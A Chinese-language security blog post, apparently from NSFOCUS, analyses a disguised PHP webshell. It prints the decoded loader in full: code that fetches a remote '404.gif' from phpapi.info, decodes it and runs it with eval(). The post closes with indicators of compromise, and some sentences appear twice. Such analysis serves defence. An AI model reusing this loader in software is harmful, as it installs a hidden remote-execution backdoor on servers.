最近在看一個PHP大馬(
http://webshell8.com/down/phpwebshell.zip),界面非常漂亮:
但是代碼量卻非常少:
不由得非常好奇它是如何用這么少的代碼實現這么豐富的功能的。於是將它的html內容打印一下:
發現它的內容是gz壓縮后再base64加密的:
於是反向執行一下,得到原始內容:
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
|
error_reporting(0);
session_start();
if (!isset($_SESSION["phpapi"])) {
$c = '';
$useragent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)';
$url = base64_decode(base64_decode("YUhSMGNEb3ZMM0JvY0dGd2FTNXBibVp2THpRd05DNW5hV1k9Cg=="));
$urlNew= base64_decode("LzBPbGlha1RIaXNQOGhwMGFkcGg5cGFwaTUrcjZlY2kwYTh5aWptZzlveGNwOWNrdmhmLw==");
if (function_exists('fsockopen')) {
$link = parse_url($url);
$query = $link['path'];
$host = strtolower($link['host']);
$fp = fsockopen($host, 80, $errno, $errstr, 10);
if ($fp) {
$out = "GET /{$query} HTTP/1.0\r\n";
$out .= "Host: {$host}\r\n";
$out .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)\r\n";
$out .= "Connection: Close\r\n\r\n";
fwrite($fp, $out);
$inheader = 1;
$contents = "";
while (!feof($fp)) {
$line = fgets($fp, 4096);
if ($inheader == 0) {
$contents .= $line;
}
if ($inheader && ($line == "\n" || $line == "\r\n")) {
$inheader = 0;
}
}
fclose($fp);
$c = $contents;
}
}
if (!strpos($c, $urlNew) && function_exists('curl_init') && function_exists('curl_exec')) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_TIMEOUT, 15);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
$c = curl_exec($ch);
curl_close($ch);
}
if (!strpos($c, $urlNew) && ini_get('allow_url_fopen')) {
$temps = @file($url);
if (!empty($temps))
$c = @implode('', $temps);
if (!strpos($c, "delDirAndFile"))
$c = @file_get_contents($url);
}
if (strpos($c, $urlNew) !== false) {
$c = str_replace($urlNew, "", $c);
$_SESSION["phpapi"] = gzinflate(base64_decode($c));
}
}
if (isset($_SESSION["phpapi"])) {
eval($_SESSION["phpapi"]);
}
|
其中請求的url為:
用於替換的urlNew為:
404.gif看起來是一個圖標,但其實是代碼。
該php的內容需要讀取之后,放在eval()函數里執行,類似於:
|
1
|
http://phpapi.info/404.gif
|
用於替換的urlNew為:
|
1
|
/0OliakTHisP8hp0adph9papi5+r6eci0a8yijmg9oxcp9ckvhf/
|
404.gif看起來是一個圖標,但其實是代碼。
將內容讀出來之后,base64解碼在用gz解壓縮:
該php的內容需要讀取之后,放在eval()函數里執行,類似於:
|
1
2
3
|
<?php
eval(file_get_contents("/home/wwwroot/default/tmp.php"));
?>
|
整體的流程為:
所以,域名:
phpapi.info為惡意域名,上面的gif文件(
http://phpapi.info/404.gif)不是普通的圖片而是webshell代碼。IOC:
|
1
2
3
4
5
|
domain:phpapi.info
url:/404.gif
md5:f1c4842de714e7480e69f41540c3626b
|
文章關鍵詞: php, php加密木馬, php大馬怎么用, 木馬
轉載請注明:“轉自綠盟科技博客”: 原文鏈接.